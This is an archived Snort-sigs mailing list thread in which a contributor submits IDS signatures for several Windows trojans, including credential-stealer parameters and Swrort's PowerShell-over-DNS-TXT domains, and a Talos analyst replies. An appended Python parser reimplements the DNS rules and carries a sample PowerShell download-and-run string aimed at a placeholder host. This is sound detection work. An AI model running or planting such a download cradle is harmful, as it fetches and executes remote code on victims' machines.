Snort mailing list archives
Re: Multiple signatures 005
From: Marcos Rodriguez <mrodriguez () sourcefire com>
Date: Mon, 23 Jul 2018 14:55:58 -0400
On Mon, Jul 23, 2018 at 12:59 PM, Y M via Snort-sigs <snort-sigs () lists snort org> wrote:

Hi,

May I suggest enjoying a21b5295ca0e1f10ca7c3f76b632e4de (Win.Trojan.Swrort below); PowerShell command execution via DNS TXT response. Pcaps are available for all of the rules.

# --------------------
# Date: 2018-07-21
# Title: Win.Trojan.Fuerboos, Win.Trojan.NeutrinoBot
# Tests: pcap
# Reference:
# - https://www.virustotal.com/#/file/8b9cf529dab1992fa37508dcd02173e615c2f3d95a46f2059d06050dd7dbcb0f/detection
# Confidence: medium

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.NeutrinoBot variant outbound connection"; flow:to_server,established; content:"/tasks.php"; fast_pattern:only; http_uri; content:"Cookie: "; http_header; content:"auth=1"; http_client_body; metadata:ruleset community, service http; reference:url,www.virustotal.com/#/file/8b9cf529dab1992fa37508dcd02173e615c2f3d95a46f2059d06050dd7dbcb0f/detection; classtype:trojan-activity; sid:8000190; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.NeutrinoBot variant outbound connection"; flow:to_server,established; content:"/tasks.php"; fast_pattern:only; http_uri; content:"Cookie: "; http_header; content:"cmd="; http_client_body; content:"&uid="; http_client_body; content:"&os="; http_client_body; content:"&av="; http_client_body; metadata:ruleset community, service http; reference:url,www.virustotal.com/#/file/8b9cf529dab1992fa37508dcd02173e615c2f3d95a46f2059d06050dd7dbcb0f/detection; classtype:trojan-activity; sid:8000191; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.NeutrinoBot variant outbound connection"; flow:to_server,established; content:"/tasks.php"; fast_pattern:only; http_uri; content:"Cookie: "; http_header; content:"fail="; http_client_body; content:"&task_id="; http_client_body; metadata:ruleset community, service http; reference:url,www.virustotal.com/#/file/8b9cf529dab1992fa37508dcd02173e615c2f3d95a46f2059d06050dd7dbcb0f/detection; classtype:trojan-activity; sid:8000192; rev:1;)

# --------------------
# Date: 2018-07-21
# Title: Win.Trojan.GenKryptik (Talos File Reputation: W32.3A4A773CDF-95.SBX.TG)
# Tests: pcap
# Reference:
# - https://www.virustotal.com/#/file/3a4a773cdfa20182f6fab817d010a0a47e94784e1b02e009c1c5c9766b43a25f/detection
# Confidence: medium

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.GenKryptik outbound connection"; flow:to_server,established; urilen:10; content:"User-Agent: Mozilla/4.0 (compatible|3B| MSIE 6.0b|3B| Windows NT 5.1)"; fast_pattern:only; http_header; content:"/index.php"; http_uri; content:"POST"; http_method; content:"Content-Length"; http_header; content:!"Content-Type"; http_header; content:!"Connection"; http_header; content:!"Accept"; http_header; content:!"Referer"; http_header; metadata:ruleset community, service http; reference:url,www.virustotal.com/#/file/3a4a773cdfa20182f6fab817d010a0a47e94784e1b02e009c1c5c9766b43a25f/detection; classtype:trojan-activity; sid:8000194; rev:1;)

# --------------------
# Date: 2018-07-22
# Title: Win.Trojan.MSIL (ClamAV: Win.Trojan.Agent-1288686, Talos File Reputation: W32.Auto:cc093c.in03.Talos)
# Tests: pcap
# Reference:
# - https://www.virustotal.com/#/file/cc093cca83f700878856b06cb3623a912550d44f82071e88cbbc160381391a91/detection
# Confidence: medium

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.MSIL outbound connection"; flow:to_server,established; content:"&wallets="; fast_pattern:only; http_uri; content:"?hwid="; http_uri; content:"&pswd="; http_uri; content:"&telegram="; http_uri; content:"name=|22|file|22 3B|"; http_client_body; content:!"User-Agent"; http_header; metadata:ruleset community, service http; reference:url,www.virustotal.com/#/file/cc093cca83f700878856b06cb3623a912550d44f82071e88cbbc160381391a91/detection; classtype:trojan-activity; sid:8000195; rev:1;)

# --------------------
# Date: 2018-07-22
# Title: Win.Trojan.Swrort (ClamAV: Win.Trojan.Swrort-5710536-0)
# Tests: pcap
# Reference:
# - https://www.virustotal.com/#/file/c4f069d079330cd46e51f9469c27015ed34c6371481df83a323bc098f3b53382/detection
# Confidence: medium
# Notes:
# - PowerShell execution via DNS TXT
# - The word "shino" in the domains may be referred to as "what" in some dialects

alert udp any any -> $HOME_NET any (msg:"MALWARE-CNC PowerShell command in DNS TXT Response"; flow:to_client; dsize:>100; content:"|00 10 00 01 00 00|"; content:"powershell "; distance:0; nocase; metadata:ruleset community, service dns; reference:url,www.virustotal.com/#/file/c4f069d079330cd46e51f9469c27015ed34c6371481df83a323bc098f3b53382/detection; classtype:trojan-activity; sid:8000196; rev:1;)

alert udp any any -> $HOME_NET any (msg:"MALWARE-CNC PowerShell command in DNS TXT Response"; flow:to_client; dsize:>100; content:"|00 10 00 01 00 00|"; content:"new-object net.webclient"; nocase; metadata:ruleset community, service dns; reference:url,www.virustotal.com/#/file/c4f069d079330cd46e51f9469c27015ed34c6371481df83a323bc098f3b53382/detection; classtype:trojan-activity; sid:8000197; rev:1;)

alert udp $HOME_NET any -> $EXTERNAL_NET 53 (msg:"MALWARE-OTHER DNS request for known malware domain shinohack.me - Win.Trojan.Swrort"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|09|shinohack|02|me"; fast_pattern:only; content:"|00 10 00 01|"; distance:0; metadata:ruleset community, service dns; reference:url,www.virustotal.com/#/file/c4f069d079330cd46e51f9469c27015ed34c6371481df83a323bc098f3b53382/detection; classtype:trojan-activity; sid:8000198; rev:1;)

alert udp $HOME_NET any -> $EXTERNAL_NET 53 (msg:"MALWARE-OTHER DNS request for known malware domain shinobotps1.com - Win.Trojan.Swrort"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|0B|shinobotps1|03|com"; fast_pattern:only; content:"|00 01 00 01|"; distance:0; metadata:ruleset community, service dns; reference:url,www.virustotal.com/#/file/c4f069d079330cd46e51f9469c27015ed34c6371481df83a323bc098f3b53382/detection; classtype:trojan-activity; sid:8000199; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"MALWARE-CNC Win.Trojan.Swrort inbound SSL certificate"; flow:to_client,established; content:"|16 03 01|"; content:"|02|"; distance:2; content:"|03 01|"; distance:3; content:"|55 04 03 13 0F|shinobotps1.com"; metadata:ruleset community, service ssl; reference:url,app.any.run/tasks/95c76eff-5118-46d1-9e62-cc5d4d2a1310; classtype:trojan-activity; sid:8000200; rev:1;)

Thanks.
YM

_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists snort org
https://lists.snort.org/mailman/listinfo/snort-sigs

Please visit http://blog.snort.org for the latest news about Snort!

Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette

Visit the Snort.org to subscribe to the official Snort ruleset, make sure to stay up to date to catch the most emerging threats (https://snort.org/downloads/#rule-downloads)!
Hi Yaser,

Thanks for these submissions. We will review each of them and get back to you when finished. We'd appreciate any pcaps you could send, including the follow-up email you sent for CVE-2018-2894.

Have a great day!

--
Marcos Rodriguez
Cisco Talos
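The four UDP rules in the submission (sids 8000196 to 8000199) match raw byte patterns: `|00 10 00 01 00 00|` is TYPE=TXT, CLASS=IN and the first two TTL bytes, `byte_test:1,!&,0xF8,2` requires QR=0 and opcode 0 in the flags byte, and `|09|shinohack|02|me` is the wire encoding of the QNAME. The script below is an added example, not code from the submitter or from Snort, that implements the same checks by actually parsing the DNS message (header, compressed names, TXT RDATA strings) so a reader can see what each byte pattern stands for. The domains and indicator strings are taken from the rules; the sample query and TXT response are constructed in the script and are not from the pcaps mentioned in the thread.

```python
"""Parse DNS messages and flag the indicators the Swrort UDP rules look for."""
import struct

# Indicators copied from the rules in the thread.
WATCHLIST = {"shinohack.me", "shinobotps1.com"}            # sids 8000198 / 8000199
TXT_NEEDLES = ("powershell ", "new-object net.webclient")  # sids 8000196 / 8000197
TYPE_TXT = 16
# Constructed sample for this demo only (not from the submitter's pcaps).
SAMPLE_TXT = b"powershell -c (new-object net.webclient).DownloadString('http://c2.example.invalid/')"


def encode_name(name: str) -> bytes:
    """Encode a dotted name as DNS labels, e.g. |09|shinohack|02|me|00|."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(name: str, qtype: int, txid: int = 0x1234) -> bytes:
    """Standard query: QR=0, opcode 0, RD set (flags 0x0100), one question."""
    return struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, 1)


def build_txt_response(name: str, txt: bytes, txid: int = 0x1234) -> bytes:
    """Response (flags 0x8180) with one TXT answer whose name is a pointer to the question (0xC00C)."""
    question = encode_name(name) + struct.pack("!HH", TYPE_TXT, 1)
    chunks = (txt[i:i + 255] for i in range(0, len(txt), 255))        # TXT strings are <=255 bytes each
    rdata = b"".join(bytes([len(c)]) + c for c in chunks)
    answer = b"\xC0\x0C" + struct.pack("!HHIH", TYPE_TXT, 1, 60, len(rdata)) + rdata
    return struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0) + question + answer


def read_name(msg: bytes, off: int) -> tuple:
    """Decode a possibly compressed name; return (name, offset just past it in the message)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # compression pointer
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            if end is None:
                end = off + 2                           # caller continues after the 2-byte pointer
            off = struct.unpack_from("!H", msg, off)[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii", "replace"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse(msg: bytes) -> dict:
    """Return header fields, questions [(name, qtype)] and answers [(name, rtype, rdata)]."""
    txid, flags, qd, an, _ns, _ar = struct.unpack_from("!6H", msg, 0)
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = read_name(msg, off)
        qtype, _qclass = struct.unpack_from("!HH", msg, off)
        off += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10
        answers.append((name, rtype, msg[off:off + rdlen]))
        off += rdlen
    return {"id": txid, "is_response": bool(flags & 0x8000), "opcode": (flags >> 11) & 0xF,
            "questions": questions, "answers": answers}


def txt_strings(rdata: bytes) -> list:
    """Split TXT RDATA into its <len><chars> strings."""
    out, i = [], 0
    while i < len(rdata):
        length = rdata[i]
        out.append(rdata[i + 1:i + 1 + length].decode("latin-1"))
        i += 1 + length
    return out


def alerts(msg: bytes) -> list:
    """One alert string per matched indicator, mirroring sids 8000196-8000199."""
    p = parse(msg)
    found = []
    if not p["is_response"] and p["opcode"] == 0:     # same condition as byte_test:1,!&,0xF8,2
        for name, qtype in p["questions"]:
            if name.lower() in WATCHLIST:
                found.append(f"DNS request for known malware domain {name} (qtype {qtype})")
    if p["is_response"]:
        for name, rtype, rdata in p["answers"]:
            if rtype != TYPE_TXT:
                continue
            text = " ".join(txt_strings(rdata)).lower()   # the rules use nocase
            for needle in TXT_NEEDLES:
                if needle in text:
                    found.append(f"PowerShell indicator {needle!r} in TXT answer for {name}")
    return found


if __name__ == "__main__":
    for pkt in (build_query("shinohack.me", TYPE_TXT), build_txt_response("shinohack.me", SAMPLE_TXT)):
        print(alerts(pkt) or ["clean"])
```

Because the parser walks the answer section instead of searching for `|00 10 00 01 00 00|` anywhere in the payload, it does not depend on the TTL's high bytes being zero and does not fire on TXT-like bytes that happen to sit inside another record's RDATA; conversely, it inspects every TXT string in the answer, not only bytes after the first match.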
Current thread:
- Multiple signatures 005 Y M via Snort-sigs (Jul 23)
- Re: Multiple signatures 005 Marcos Rodriguez (Jul 23)